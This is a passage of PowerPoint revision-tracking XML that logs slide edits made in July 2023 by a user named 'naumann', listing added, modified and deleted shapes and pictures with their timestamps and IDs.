        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:48:06.458" v="299"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4204730160" sldId="1233"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:47:55.786" v="294" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204730160" sldId="1233"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:38:05.064" v="144"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204730160" sldId="1233"/>
            <ac:spMk id="4" creationId="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:41:55.812" v="200" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204730160" sldId="1233"/>
            <ac:spMk id="6" creationId="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:42:06.594" v="206" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204730160" sldId="1233"/>
            <ac:spMk id="8" creationId="{45894254-E6B2-140A-90D1-4A59B4820B8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:38:22.784" v="155"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204730160" sldId="1233"/>
            <ac:picMk id="5" creationId="{6D2ED48C-4738-D870-2732-45C9447C6AD6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:42:20.016" v="207" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204730160" sldId="1233"/>
            <ac:picMk id="7" creationId="{46F8777C-0C02-B998-8F41-6A5063005368}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:48:39.147" v="304" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3748148705" sldId="1234"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:44:39.993" v="238" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3748148705" sldId="1234"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:48:39.147" v="304" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3748148705" sldId="1234"/>
            <ac:spMk id="6" creationId="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:46:56.595" v="281"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3748148705" sldId="1234"/>
            <ac:spMk id="8" creationId="{45894254-E6B2-140A-90D1-4A59B4820B8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:45:12.448" v="279"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3748148705" sldId="1234"/>
            <ac:picMk id="7" creationId="{46F8777C-0C02-B998-8F41-6A5063005368}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:53:35.914" v="427" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="392570200" sldId="1235"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:48:51.867" v="309" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="392570200" sldId="1235"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:53:35.914" v="427" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="392570200" sldId="1235"/>
            <ac:spMk id="6" creationId="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:53:25.367" v="425" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="392570200" sldId="1235"/>
            <ac:picMk id="4" creationId="{E62AA1DB-9B06-29B3-E48A-1BA6A1FE85CB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:58:20.103" v="526" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="179781519" sldId="1236"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:56:03.610" v="472" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="179781519" sldId="1236"/>
            <ac:spMk id="6" creationId="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:58:14.368" v="524" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="179781519" sldId="1236"/>
            <ac:spMk id="7" creationId="{5DDB1744-31A0-FE53-522E-B7C7C441460C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:53:51.634" v="429"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="179781519" sldId="1236"/>
            <ac:picMk id="4" creationId="{E62AA1DB-9B06-29B3-E48A-1BA6A1FE85CB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:58:20.103" v="526" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="179781519" sldId="1236"/>
            <ac:picMk id="5" creationId="{70DEFCD2-C3EC-A888-CAB7-0E5214877E22}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:58:17.493" v="525" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="179781519" sldId="1236"/>
            <ac:picMk id="8" creationId="{E9028393-F340-09D7-B743-DD63000A4A07}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T15:02:38.649" v="559"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2307758693" sldId="1237"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T15:00:33.282" v="540" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2307758693" sldId="1237"/>
            <ac:spMk id="6" creationId="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T15:01:46.927" v="556" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2307758693" sldId="1237"/>
            <ac:spMk id="7" creationId="{5DDB1744-31A0-FE53-522E-B7C7C441460C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T15:01:26.867" v="552" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2307758693" sldId="1237"/>
            <ac:picMk id="4" creationId="{BABBC763-E4D2-4ABB-3462-9E83FF86B109}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:59:08.090" v="534"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2307758693" sldId="1237"/>
            <ac:picMk id="5" creationId="{70DEFCD2-C3EC-A888-CAB7-0E5214877E22}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:59:08.230" v="535"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2307758693" sldId="1237"/>
            <ac:picMk id="8" creationId="{E9028393-F340-09D7-B743-DD63000A4A07}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T15:01:33.926" v="554" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2307758693" sldId="1237"/>
            <ac:picMk id="9" creationId="{5AF2E5D7-9DB8-D3D8-3E8C-EE5887367A83}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:25:22.997" v="1065"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:16:45.794" v="1050" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="346"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:16:45.794" v="1050" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="346"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:21:04.848" v="1064" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="205556993" sldId="1101"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:21:04.848" v="1064" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="205556993" sldId="1101"/>
            <ac:spMk id="4" creationId="{8E9D2EEE-39FF-901E-B51E-3B5A0EC61268}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:18:02.280" v="1062" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1593495054" sldId="1102"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:18:02.280" v="1062" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1593495054" sldId="1102"/>
            <ac:spMk id="4" creationId="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:25:22.997" v="1065"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1766237039" sldId="1189"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T18:25:22.997" v="1065"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1766237039" sldId="1189"/>
            <ac:graphicFrameMk id="6" creationId="{409DE0C5-815C-583B-1D3A-2E7750D9F924}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T15:52:46.855" v="1" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3573718190" sldId="1192"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T15:52:46.855" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3573718190" sldId="1192"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:01:10.387" v="53" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="35812785" sldId="1196"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:00:51.230" v="48" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:01:04.512" v="51" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:spMk id="6" creationId="{4725628E-BBE1-B8E2-1A3B-DE00A7BDEBC2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:01:10.387" v="53" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:picMk id="7" creationId="{D6F6EE8C-AABF-049A-1000-B0FC671EEAA8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:04:13.737" v="77" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2092211216" sldId="1197"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T15:58:02.084" v="34" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T15:58:07.116" v="38" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:spMk id="6" creationId="{3CE843E3-84AC-086E-EC19-6322B55A4492}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:04:13.737" v="77" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:spMk id="8" creationId="{D46BA5A6-6D4D-4DF0-C6FE-F04BF8F0AED0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T15:58:16.991" v="40" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:picMk id="5" creationId="{27EA2DEC-C336-AA53-B8FC-193B750D6726}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T15:58:23.147" v="41" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:picMk id="9" creationId="{CE933B05-BD95-D833-2BCC-6BE2AA2E704F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:06:00.053" v="102" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3502854763" sldId="1198"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:05:57.537" v="101" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:spMk id="10" creationId="{04E12160-5497-0081-AA17-21DA85A38413}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:04:32.784" v="78" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:spMk id="11" creationId="{46FF45F9-A025-60E4-6F2A-635F26BEAE4B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{663DCA41-CAD5-5D45-EBD6-4E0CADEC1CCF}" dt="2023-07-12T16:06:00.053" v="102" actId="1076"/>
